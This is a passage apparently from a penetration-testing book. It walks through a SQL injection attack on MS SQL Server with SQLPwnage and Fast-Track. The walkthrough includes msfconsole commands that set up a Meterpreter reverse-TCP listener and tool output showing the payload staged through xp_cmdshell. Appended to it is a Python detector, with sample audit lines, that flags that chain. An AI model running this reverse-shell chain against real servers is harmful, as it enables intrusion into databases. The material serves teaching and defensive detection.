We’ll use SQLPwnage to deploy the Meterpreter console via SQL injection on the target and gain administrative access to its backend database. Recall from Chapter 11 that SQLPwnage is an automated way of attacking MS SQL–based injection flaws; it uses multiple methods of attack in an attempt to fully compromise the SQL server via the xp_cmdshell stored procedure.
Before launching the attack, we need to set up some options through msfconsole. For practice, let’s create our own Metasploit listener manually. Fast-Track can set it up for you, but we will be loading the auto_add_route plugin within Metasploit so that we can automatically connect to systems on the internal network. We’ll create a listener and then launch Fast-Track to attack the system.
root@bt:/opt/framework3/msf3# msfconsole
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.32.129
LHOST => 172.16.32.129
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > load auto_add_route
[*] Successfully loaded plugin: auto_add_route
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
msf exploit(handler) >
With our listener waiting for a connection from our soon-to-be compromised target, we launch Fast-Track. (When the xterm window opens, close it since we already have a listener set up.)
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=172.16.32.129,LPORT=443
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
. . . SNIP . . .
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 8, this may take a bit...
Sending chunk 2 of 8, this may take a bit...
. . . SNIP . . .
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
This should look familiar. We’ve essentially attacked the web application through Fast-Track and exploited it via SQL injection. We used the xp_cmdshell stored procedure and the binary-to-hex conversion technique to obtain a full-fledged Meterpreter shell.
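The chain the Fast-Track output above walks through (enable xp_cmdshell, stage the payload as hex chunks, rebuild it with debug) leaves a distinctive trail in SQL Server statement auditing. The following is an added detection example, not code from the book or from Fast-Track; it assumes a simplified "timestamp login statement" audit-line layout and runs over constructed sample lines.

```python
import re
from collections import defaultdict

# Constructed sample audit lines (not real captures). Assumed layout:
# "<timestamp> <login> <statement>", one statement per line.
SAMPLE_AUDIT = """\
2024-01-01T10:00:01 webapp SELECT name FROM products WHERE id = 42
2024-01-01T10:00:05 webapp EXEC sp_configure 'show advanced options', 1; RECONFIGURE
2024-01-01T10:00:06 webapp EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE
2024-01-01T10:00:09 webapp EXEC master..xp_cmdshell 'echo 4d5a900003000000 >> C:\\temp\\p.hex'
2024-01-01T10:00:10 webapp EXEC master..xp_cmdshell 'echo 0400000000ffff00 >> C:\\temp\\p.hex'
2024-01-01T10:00:15 webapp EXEC master..xp_cmdshell 'debug < C:\\temp\\p.hex'
2024-01-01T10:01:00 reporting SELECT COUNT(*) FROM orders
"""

# One rule per stage of the xp_cmdshell / hex-to-binary chain shown above.
RULES = {
    "xp_cmdshell_enabled": re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.I),
    "xp_cmdshell_call":    re.compile(r"\bxp_cmdshell\b", re.I),
    "hex_chunk_staged":    re.compile(r"echo\s+[0-9a-f]{8,}\s*>>", re.I),
    "debug_rebuild":       re.compile(r"\bdebug(\.exe)?\s*<", re.I),
}

LINE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")

def scan_audit(text):
    """Return {login: {rule_name: hit_count}} for every rule that matched."""
    hits = defaultdict(lambda: defaultdict(int))
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        _ts, login, stmt = m.groups()
        for name, rx in RULES.items():
            if rx.search(stmt):
                hits[login][name] += 1
    return {login: dict(h) for login, h in hits.items()}

def chain_suspects(hits, min_chunks=2):
    """Logins that enabled xp_cmdshell and then staged several hex chunks:
    one stage alone is noise, the full sequence is the attack pattern."""
    return sorted(login for login, h in hits.items()
                  if h.get("xp_cmdshell_enabled")
                  and h.get("hex_chunk_staged", 0) >= min_chunks)

if __name__ == "__main__":
    hits = scan_audit(SAMPLE_AUDIT)
    for login in chain_suspects(hits):
        print(f"ALERT {login}: {hits[login]}")
```

On the sample, only the web application's login trips the full chain; a login that merely runs xp_cmdshell once is reported in the hit table but not raised as a chain alert.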